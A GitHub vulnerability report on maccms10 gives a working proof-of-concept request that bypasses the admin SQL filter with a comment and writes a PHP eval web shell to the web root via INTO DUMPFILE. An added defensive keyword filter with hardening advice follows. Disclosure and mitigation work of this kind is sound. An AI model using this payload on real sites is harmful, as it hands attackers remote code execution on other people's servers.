magicblack / maccms10

Apple CMS official site, Apple CMS v10, maccmsv10, Mac CMS, open-source CMS, content management system, video sharing program, episode plot program, URL navigation program, article program, comic program, image program

admin\controller\Database.php has a SQL injection that can upload files #1174

Open 0kooo opened 3 months ago

0kooo commented 3 months ago

POC

POST /admin.php/admin/database/sql.html HTTP/1.1
Host: host
Content-Length: 162
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; xinhu_mo_adminid=yy0nm0mjj0mjn0vy0mmj0vk0mmn0mjm0iq0mjz0mjz0iv0vi0iu0nv07; xinhu_ca_adminuser=rock; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=3a2cdfed8edffe57; DedeLoginTime=1723190565; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=9f6e455551874f96; PHPSESSID=2c0harmim0vftioojbj8nqvibs
Connection: keep-alive

__token__=6ffe6f2213f3ab54515b904dff3d2923&sql=%2F**%2Fselect+'%3C%3Fphp+%40eval(%24_POST%5B1%5D)%3B'+into+dumpfile+'C%3A%2Fphpstudy_pro%2FWWW%2Fmaccms10%2F1.php'

Version: 2024.1000.4043

Description: The input box for executing SQL statements in the backend database module can be bypassed, leading to the execution of a web shell and thereby achieving file upload. The vulnerable directory is as follows: application\admin\controller\Database.php

Process: The following statement should be entered into the input box: /**/select '<?php @eval($_POST[1]);' into dumpfile 'root directory/1.php'

Result: Accessing the file just uploaded to the website's root directory by its filename achieves Remote Code Execution (RCE).

Screenshots: 1. upload (Snipaste_2024-08-09_22-30-30) 2. access (Snipaste_2024-08-09_22-30-48)
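The report above shows that a leading `/**/` comment is enough to get a file-writing statement past the admin SQL box's screening. The following is an added example of how a defender can screen such input; it is not maccms10 project code and not the project's actual filter (the report does not show it). Function names (`normaliseSql`, `isFileWriteSql`) and the sample statements are constructed for illustration; the first sample keeps the shape of the statement in this issue but uses a placeholder literal instead of the web-shell string.

```php
<?php
// Added example (not maccms10 code): normalise admin-supplied SQL before
// keyword screening so that comment and whitespace tricks cannot hide
// MySQL file-system constructs such as INTO DUMPFILE from the check.

function normaliseSql(string $sql): string
{
    // MySQL executes the body of /*! ... */ "versioned" comments, so keep it.
    $sql = preg_replace('~/\*!\d*(.*?)\*/~s', ' $1 ', $sql);
    // Ordinary /* ... */ comments (including the empty /**/) act as whitespace.
    $sql = preg_replace('~/\*.*?\*/~s', ' ', $sql);
    // Collapse whitespace runs to one space and upper-case for matching.
    $sql = preg_replace('~\s+~', ' ', $sql);
    return strtoupper(trim($sql));
}

// Returns true when the statement (after normalisation) contains a construct
// that reads from or writes to the database server's file system.
function isFileWriteSql(string $sql): bool
{
    $norm = normaliseSql($sql);
    return (bool) preg_match(
        '~\bINTO (OUTFILE|DUMPFILE)\b|\bLOAD_FILE\s*\(|\bLOAD DATA\b~',
        $norm
    );
}

// Constructed inputs with the expected verdict of the check.
$samples = [
    "/**/select 'placeholder' into dumpfile '/path/to/webroot/1.php'" => true,  // shape from this issue
    "select 'x'\n  into/**/OUTFILE '/tmp/out'"                       => true,  // keyword split by a comment
    "select /*!50000 'x' into dumpfile '/tmp/out' */"                 => true,  // versioned comment is executed
    "select count(*) from sample_table"                                => false, // ordinary read query
    "select 'into dumpfile' as label from sample_table"                => true,  // text inside a literal: fail closed
];

foreach ($samples as $sql => $expected) {
    $blocked = isFileWriteSql($sql);
    printf(
        "%-66s blocked=%-5s expected=%s\n",
        str_replace("\n", '\n', $sql),
        var_export($blocked, true),
        var_export($expected, true)
    );
}
```

The last sample is rejected even though `into dumpfile` only appears inside a string literal; for an administrative "run arbitrary SQL" feature, refusing a rare legitimate query is the safer side to err on. Keyword screening of this kind is defence in depth only: the control that actually prevents a web shell from being written is at the database layer, namely running the application with a MySQL account that does not hold the `FILE` privilege and setting `secure_file_priv` on the server so that `INTO OUTFILE`/`INTO DUMPFILE` cannot target the web root at all.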